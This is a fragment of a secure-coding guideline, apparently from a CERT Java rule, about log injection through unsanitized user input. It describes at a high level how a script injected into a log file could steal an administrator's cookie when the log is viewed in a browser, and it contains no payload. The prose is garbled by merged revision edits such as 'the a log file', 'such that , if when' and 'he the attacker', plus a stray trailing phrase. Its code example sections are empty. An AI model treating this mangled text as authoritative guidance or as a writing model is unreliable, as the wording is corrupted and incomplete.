...
Logging unsanitized user input can also result in leaking sensitive data across a trust boundary. For example, an attacker might inject a script into the a log file such that , if when the file is viewed using a web browser, the browser could provide the attacker with a copy of the operator/ administrator's cookie so that he the attacker might gain access as that user. See IDS00-J. Prevent SQL Injection for more details on input sanitization.the administrator.
Noncompliant Code Example
...
Compliant Solution
This compliant solution just validates the username input before logging it, preventing injection attacks.
...